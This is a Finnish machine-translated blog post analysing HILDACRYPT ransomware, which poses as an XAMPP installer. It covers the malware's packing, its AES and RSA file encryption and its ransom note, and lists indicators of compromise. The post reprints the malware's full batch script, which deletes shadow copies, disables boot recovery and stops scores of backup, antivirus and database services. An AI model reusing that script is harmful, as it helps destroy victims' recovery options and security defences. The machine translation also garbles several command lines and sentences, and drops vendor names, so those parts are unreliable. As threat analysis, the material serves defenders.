Hei, Habr! Jälleen kerran puhumme Ransomware-luokan haittaohjelmien uusimmista versioista. HILDACRYPT on uusi lunnasohjelma, Hilda-perheen jäsen, joka löydettiin elokuussa 2019 ja joka on nimetty ohjelmiston jakeluun käytetyn Netflix-sarjakuvan mukaan. Tänään tutustumme tämän päivitetyn ransomware-viruksen teknisiin ominaisuuksiin.
Hilda ransomwaren ensimmäisessä versiossa on linkki johonkin Youtubeen sarjakuvasarja sisältyi lunastuskirjeeseen. HILDACRYPT naamioituu lailliseksi XAMPP-asennusohjelmaksi, joka on helposti asennettava Apache-jakelu, joka sisältää MariaDB:n, PHP:n ja Perlin. Samanaikaisesti kryptolokerilla on eri tiedostonimi - xamp. Lisäksi ransomware-tiedostolla ei ole sähköistä allekirjoitusta.
Staattinen analyysi
Kiristysohjelma sisältyy MS Windowsille kirjoitettuun PE32.NET-tiedostoon. Sen koko on 135 168 tavua. Sekä pääohjelmakoodi että puolustajaohjelmakoodi kirjoitetaan C#:lla. Kokoamispäivämäärän ja aikaleiman mukaan binaari on luotu 14.
Detect It Easyn mukaan kiristysohjelma on arkistoitu Confuserilla ja ConfuserExillä, mutta nämä hämärälaitteet ovat samat kuin ennenkin, vain ConfuserEx on Confuserin seuraaja, joten niiden koodiallekirjoitukset ovat samanlaiset.
HILDACRYPT on todellakin pakattu ConfuserExiin.
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Hyökkäysvektori
Todennäköisimmin lunnasohjelma löydettiin yhdeltä web-ohjelmointisivustolta, joka naamioitui lailliseksi XAMPP-ohjelmaksi.
Koko tartuntaketju on nähtävissä .
Hämärtäminen
Kiristysohjelmamerkkijonot tallennetaan salatussa muodossa. Kun HILDACRYPT käynnistetään, se purkaa ne Base64:n ja AES-256-CBC:n avulla.
Asennus
Ensinnäkin ransomware luo kansion %AppDataRoaming%:iin, jossa GUID-parametri (Globally Unique Identifier) luodaan satunnaisesti. Lisäämällä bat-tiedoston tähän sijaintiin, kiristysohjelmavirus käynnistää sen käyttämällä cmd.exe-tiedostoa:
cmd.exe /c JKfgkgj3hjgfhjka.bat & poistu
Sitten se alkaa suorittaa eräkomentosarjaa järjestelmän ominaisuuksien tai palveluiden poistamiseksi käytöstä.
Skripti sisältää pitkän listan komentoja, jotka tuhoavat varjokopiot, poistavat SQL-palvelimen käytöstä, varmuuskopiointi- ja virustorjuntaratkaisut.
Se esimerkiksi yrittää pysäyttää Acronis Backup -palvelut epäonnistuneesti. Lisäksi se hyökkää varmuuskopiointijärjestelmiin ja virustorjuntaratkaisuihin seuraavilta toimittajilta: Veeam, Sophos, Kaspersky, McAfee ja muut.
@echo off
:: Not really a fan of ponies, cartoon girls are better, don't you think?
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
vssadmin Delete Shadows /all /quiet
net stop SQLAgent$SYSTEM_BGC /y
net stop “Sophos Device Control Service” /y
net stop macmnsvc /y
net stop SQLAgent$ECWDB2 /y
net stop “Zoolz 2 Service” /y
net stop McTaskManager /y
net stop “Sophos AutoUpdate Service” /y
net stop “Sophos System Protection Service” /y
net stop EraserSvc11710 /y
net stop PDVFSService /y
net stop SQLAgent$PROFXENGAGEMENT /y
net stop SAVService /y
net stop MSSQLFDLauncher$TPSAMA /y
net stop EPSecurityService /y
net stop SQLAgent$SOPHOS /y
net stop “Symantec System Recovery” /y
net stop Antivirus /y
net stop SstpSvc /y
net stop MSOLAP$SQL_2008 /y
net stop TrueKeyServiceHelper /y
net stop sacsvr /y
net stop VeeamNFSSvc /y
net stop FA_Scheduler /y
net stop SAVAdminService /y
net stop EPUpdateService /y
net stop VeeamTransportSvc /y
net stop “Sophos Health Service” /y
net stop bedbg /y
net stop MSSQLSERVER /y
net stop KAVFS /y
net stop Smcinst /y
net stop MSSQLServerADHelper100 /y
net stop TmCCSF /y
net stop wbengine /y
net stop SQLWriter /y
net stop MSSQLFDLauncher$TPS /y
net stop SmcService /y
net stop ReportServer$TPSAMA /y
net stop swi_update /y
net stop AcrSch2Svc /y
net stop MSSQL$SYSTEM_BGC /y
net stop VeeamBrokerSvc /y
net stop MSSQLFDLauncher$PROFXENGAGEMENT /y
net stop VeeamDeploymentService /y
net stop SQLAgent$TPS /y
net stop DCAgent /y
net stop “Sophos Message Router” /y
net stop MSSQLFDLauncher$SBSMONITORING /y
net stop wbengine /y
net stop MySQL80 /y
net stop MSOLAP$SYSTEM_BGC /y
net stop ReportServer$TPS /y
net stop MSSQL$ECWDB2 /y
net stop SntpService /y
net stop SQLSERVERAGENT /y
net stop BackupExecManagementService /y
net stop SMTPSvc /y
net stop mfefire /y
net stop BackupExecRPCService /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop klnagent /y
net stop MSExchangeSA /y
net stop MSSQLServerADHelper /y
net stop SQLTELEMETRY /y
net stop “Sophos Clean Service” /y
net stop swi_update_64 /y
net stop “Sophos Web Control Service” /y
net stop EhttpSrv /y
net stop POP3Svc /y
net stop MSOLAP$TPSAMA /y
net stop McAfeeEngineService /y
net stop “Veeam Backup Catalog Data Service” /
net stop MSSQL$SBSMONITORING /y
net stop ReportServer$SYSTEM_BGC /y
net stop AcronisAgent /y
net stop KAVFSGT /y
net stop BackupExecDeviceMediaService /y
net stop MySQL57 /y
net stop McAfeeFrameworkMcAfeeFramework /y
net stop TrueKey /y
net stop VeeamMountSvc /y
net stop MsDtsServer110 /y
net stop SQLAgent$BKUPEXEC /y
net stop UI0Detect /y
net stop ReportServer /y
net stop SQLTELEMETRY$ECWDB2 /y
net stop MSSQLFDLauncher$SYSTEM_BGC /y
net stop MSSQL$BKUPEXEC /y
net stop SQLAgent$PRACTTICEBGC /y
net stop MSExchangeSRS /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop McShield /y
net stop SepMasterService /y
net stop “Sophos MCS Client” /y
net stop VeeamCatalogSvc /y
net stop SQLAgent$SHAREPOINT /y
net stop NetMsmqActivator /y
net stop kavfsslp /y
net stop tmlisten /y
net stop ShMonitor /y
net stop MsDtsServer /y
net stop SQLAgent$SQL_2008 /y
net stop SDRSVC /y
net stop IISAdmin /y
net stop SQLAgent$PRACTTICEMGT /y
net stop BackupExecJobEngine /y
net stop SQLAgent$VEEAMSQL2008R2 /y
net stop BackupExecAgentBrowser /y
net stop VeeamHvIntegrationSvc /y
net stop masvc /y
net stop W3Svc /y
net stop “SQLsafe Backup Service” /y
net stop SQLAgent$CXDB /y
net stop SQLBrowser /y
net stop MSSQLFDLauncher$SQL_2008 /y
net stop VeeamBackupSvc /y
net stop “Sophos Safestore Service” /y
net stop svcGenericHost /y
net stop ntrtscan /y
net stop SQLAgent$VEEAMSQL2012 /y
net stop MSExchangeMGMT /y
net stop SamSs /y
net stop MSExchangeES /y
net stop MBAMService /y
net stop EsgShKernel /y
net stop ESHASRV /y
net stop MSSQL$TPSAMA /y
net stop SQLAgent$CITRIX_METAFRAME /y
net stop VeeamCloudSvc /y
net stop “Sophos File Scanner Service” /y
net stop “Sophos Agent” /y
net stop MBEndpointAgent /y
net stop swi_service /y
net stop MSSQL$PRACTICEMGT /y
net stop SQLAgent$TPSAMA /y
net stop McAfeeFramework /y
net stop “Enterprise Client Service” /y
net stop SQLAgent$SBSMONITORING /y
net stop MSSQL$VEEAMSQL2012 /y
net stop swi_filter /y
net stop SQLSafeOLRService /y
net stop BackupExecVSSProvider /y
net stop VeeamEnterpriseManagerSvc /y
net stop SQLAgent$SQLEXPRESS /y
net stop OracleClientCache80 /y
net stop MSSQL$PROFXENGAGEMENT /y
net stop IMAP4Svc /y
net stop ARSM /y
net stop MSExchangeIS /y
net stop AVP /y
net stop MSSQLFDLauncher /y
net stop MSExchangeMTA /y
net stop TrueKeyScheduler /y
net stop MSSQL$SOPHOS /y
net stop “SQL Backups” /y
net stop MSSQL$TPS /y
net stop mfemms /y
net stop MsDtsServer100 /y
net stop MSSQL$SHAREPOINT /y
net stop WRSVC /y
net stop mfevtp /y
net stop msftesql$PROD /y
net stop mozyprobackup /y
net stop MSSQL$SQL_2008 /y
net stop SNAC /y
net stop ReportServer$SQL_2008 /y
net stop BackupExecAgentAccelerator /y
net stop MSSQL$SQLEXPRESS /y
net stop MSSQL$PRACTTICEBGC /y
net stop VeeamRESTSvc /y
net stop sophossps /y
net stop ekrn /y
net stop MMS /y
net stop “Sophos MCS Agent” /y
net stop RESvc /y
net stop “Acronis VSS Provider” /y
net stop MSSQL$VEEAMSQL2008R2 /y
net stop MSSQLFDLauncher$SHAREPOINT /y
net stop “SQLsafe Filter Service” /y
net stop MSSQL$PROD /y
net stop SQLAgent$PROD /y
net stop MSOLAP$TPS /y
net stop VeeamDeploySvc /y
net stop MSSQLServerOLAPService /y
del %0
Kun yllä mainitut palvelut ja prosessit on poistettu käytöstä, salauslukija kerää tietoja kaikista käynnissä olevista prosesseista Tasklist-komennolla varmistaakseen, että kaikki tarvittavat palvelut ovat poissa käytöstä.
tehtävälista v/fo csv
Tämä komento näyttää yksityiskohtaisen luettelon käynnissä olevista prosesseista, joiden elementit on erotettu ","-merkillä.
««csrss.exe»,«448»,«services»,«0»,«1�896 ��»,«unknown»,»�/�»,«0:00:03»,»�/�»»
Tämän tarkistuksen jälkeen lunnasohjelma aloittaa salausprosessin.
salaus
Tiedostojen salaus
HILDACRYPT käy läpi kaiken kiintolevyjen löydetyn sisällön, lukuun ottamatta Recycle.Bin- ja Reference AssembliesMicrosoft-kansioita. Jälkimmäinen sisältää tärkeitä dll-, pdb- jne. tiedostoja .Net-sovelluksille, jotka voivat vaikuttaa kiristysohjelman toimintaan. Kun haluat etsiä salattavia tiedostoja, käytetään seuraavaa laajennusluetteloa:
«.vb:.asmx:.config:.3dm:.3ds:.3fr:.3g2:.3gp:.3pr:.7z:.ab4:.accdb:.accde:.accdr:.accdt:.ach:.acr:.act:.adb:.ads:.agdl:.ai:.ait:.al:.apj:.arw:.asf:.asm:.asp:.aspx:.asx:.avi:.awg:.back:.backup:.backupdb:.bak:.lua:.m:.m4v:.max:.mdb:.mdc:.mdf:.mef:.mfw:.mmw:.moneywell:.mos:.mov:.mp3:.mp4:.mpg:.mpeg:.mrw:.msg:.myd:.nd:.ndd:.nef:.nk2:.nop:.nrw:.ns2:.ns3:.ns4:.nsd:.nsf:.nsg:.nsh:.nwb:.nx2:.nxl:.nyf:.tif:.tlg:.txt:.vob:.wallet:.war:.wav:.wb2:.wmv:.wpd:.wps:.x11:.x3f:.xis:.xla:.xlam:.xlk:.xlm:.xlr:.xls:.xlsb:.xlsm:.xlsx:.xlt:.xltm:.xltx:.xlw:.xml:.ycbcra:.yuv:.zip:.sqlite:.sqlite3:.sqlitedb:.sr2:.srf:.srt:.srw:.st4:.st5:.st6:.st7:.st8:.std:.sti:.stw:.stx:.svg:.swf:.sxc:.sxd:.sxg:.sxi:.sxm:.sxw:.tex:.tga:.thm:.tib:.py:.qba:.qbb:.qbm:.qbr:.qbw:.qbx:.qby:.r3d:.raf:.rar:.rat:.raw:.rdb:.rm:.rtf:.rw2:.rwl:.rwz:.s3db:.sas7bdat:.say:.sd0:.sda:.sdf:.sldm:.sldx:.sql:.pdd:.pdf:.pef:.pem:.pfx:.php:.php5:.phtml:.pl:.plc:.png:.pot:.potm:.potx:.ppam:.pps:.ppsm:.ppsx:.ppt:.pptm:.pptx:.prf:.ps:.psafe3:.psd:.pspimage:.pst:.ptx:.oab:.obj:.odb:.odc:.odf:.odg:.odm:.odp:.ods:.odt:.oil:.orf:.ost:.otg:.oth:.otp:.ots:.ott:.p12:.p7b:.p7c:.pab:.pages:.pas:.pat:.pbl:.pcd:.pct:.pdb:.gray:.grey:.gry:.h:.hbk:.hpp:.htm:.html:.ibank:.ibd:.ibz:.idx:.iif:.iiq:.incpas:.indd:.jar:.java:.jpe:.jpeg:.jpg:.jsp:.kbx:.kc2:.kdbx:.kdc:.key:.kpdx:.doc:.docm:.docx:.dot:.dotm:.dotx:.drf:.drw:.dtd:.dwg:.dxb:.dxf:.dxg:.eml:.eps:.erbsql:.erf:.exf:.fdb:.ffd:.fff:.fh:.fhd:.fla:.flac:.flv:.fmb:.fpx:.fxg:.cpp:.cr2:.craw:.crt:.crw:.cs:.csh:.csl:.csv:.dac:.bank:.bay:.bdb:.bgt:.bik:.bkf:.bkp:.blend:.bpw:.c:.cdf:.cdr:.cdr3:.cdr4:.cdr5:.cdr6:.cdrw:.cdx:.ce1:.ce2:.cer:.cfp:.cgm:.cib:.class:.cls:.cmt:.cpi:.ddoc:.ddrw:.dds:.der:.des:.design:.dgc:.djvu:.dng:.db:.db-journal:.db3:.dcr:.dcs:.ddd:.dbf:.dbx:.dc2:.pbl:.csproj:.sln:.vbproj:.mdb:.md»
Kiristysohjelma käyttää AES-256-CBC-algoritmia käyttäjätiedostojen salaamiseen. Avaimen koko on 256 bittiä ja alustusvektorin (IV) koko on 16 tavua.
Seuraavassa kuvakaappauksessa tavun_2 ja tavun_1 arvot saatiin satunnaisesti GetBytes()-sovelluksella.
avain
WI
Salatun tiedoston tunniste on HCY!.. Tämä on esimerkki salatusta tiedostosta. Yllä mainittu avain ja IV luotiin tälle tiedostolle.
Avaimen salaus
Salaussuoja tallentaa luodun AES-avaimen salattuun tiedostoon. Salatun tiedoston ensimmäisessä osassa on otsikko, joka sisältää tietoja, kuten HILDACRYPT, KEY, IV, FileLen, XML-muodossa ja näyttää tältä:
AES- ja IV-avainsalaus tehdään RSA-2048:lla ja koodaus Base64:llä. Julkinen RSA-avain on tallennettu salaussuojan runkoon yhteen XML-muodossa olevista salatuista merkkijonoista.
28guEbzkzciKg3N/ExUq8jGcshuMSCmoFsh/3LoMyWzPrnfHGhrgotuY/cs+eSGABQ+rs1B+MMWOWvqWdVpBxUgzgsgOgcJt7P+r4bWhfccYeKDi7PGRtZuTv+XpmG+m+u/JgerBM1Fi49+0vUMuEw5a1sZ408CvFapojDkMT0P5cJGYLSiVFud8reV7ZtwcCaGf88rt8DAUt2iSZQix0aw8PpnCH5/74WE8dAHKLF3sYmR7yFWAdCJRovzdx8/qfjMtZ41sIIIEyajVKfA18OT72/UBME2gsAM/BGii2hgLXP5ZGKPgQEf7Zpic1fReZcpJonhNZzXztGCSLfa/jQ==AQAB
AES-tiedostoavaimen salaamiseen käytetään julkista RSA-avainta. Julkinen RSA-avain on Base64-koodattu ja koostuu moduulista ja julkisesta eksponentista 65537. Salauksen purkamiseen tarvitaan yksityinen RSA-avain, joka hyökkääjällä on.
RSA-salauksen jälkeen AES-avain koodataan käyttämällä salattuun tiedostoon tallennettua Base64:ää.
Lunnasviesti
Kun salaus on valmis, HILDACRYPT kirjoittaa html-tiedoston kansioon, jossa se salasi tiedostot. Kiristysohjelmailmoitus sisältää kaksi sähköpostiosoitetta, joihin uhri voi ottaa yhteyttä hyökkääjään.
Kiristysilmoituksessa on myös rivi "No loli is safe;)" - viittaus Japanissa kiellettyihin anime- ja mangahahmoihin, joissa esiintyy pieniä tyttöjä.
johtopäätös
HILDACRYPT, uusi kiristysohjelmien perhe, on julkaissut uuden version. Salausmalli estää uhria purkamasta kiristysohjelman salaamien tiedostojen salausta. Cryptolocker käyttää aktiivisia suojausmenetelmiä varmuuskopiointijärjestelmiin ja virustorjuntaratkaisuihin liittyvien suojauspalvelujen poistamiseen käytöstä. HILDACRYPTin kirjoittaja on Netflixissä näytettävän Hildan animaatiosarjan fani, jonka linkki traileriin sisältyi ohjelman edellisen version ostokirjeeseen.
Kuten tavallista, и voivat suojata tietokoneesi HILDACRYPT lunnasohjelmilta, ja palveluntarjoajat voivat suojata asiakkaitaan . Suojaus varmistetaan sillä, että nämä ratkaisut sisältävät sisältää varmuuskopion lisäksi myös integroidun turvajärjestelmämme - Koneoppimismalliin perustuva ja käyttäytymisheuristiikkaan perustuva tekniikka, joka pystyy torjumaan nollapäivän kiristysohjelmien uhan kuin mikään muu.
Kompromissin osoittimet
Tiedostotunniste HCY!
HILDACRYPTReadMe.html
xamp.exe yhdellä kirjaimella "p" ja ilman digitaalista allekirjoitusta
SHA-256: 7b0dcc7645642c141deb03377b451d3f873724c254797e3578ef8445a38ece8a
Lähde: will.com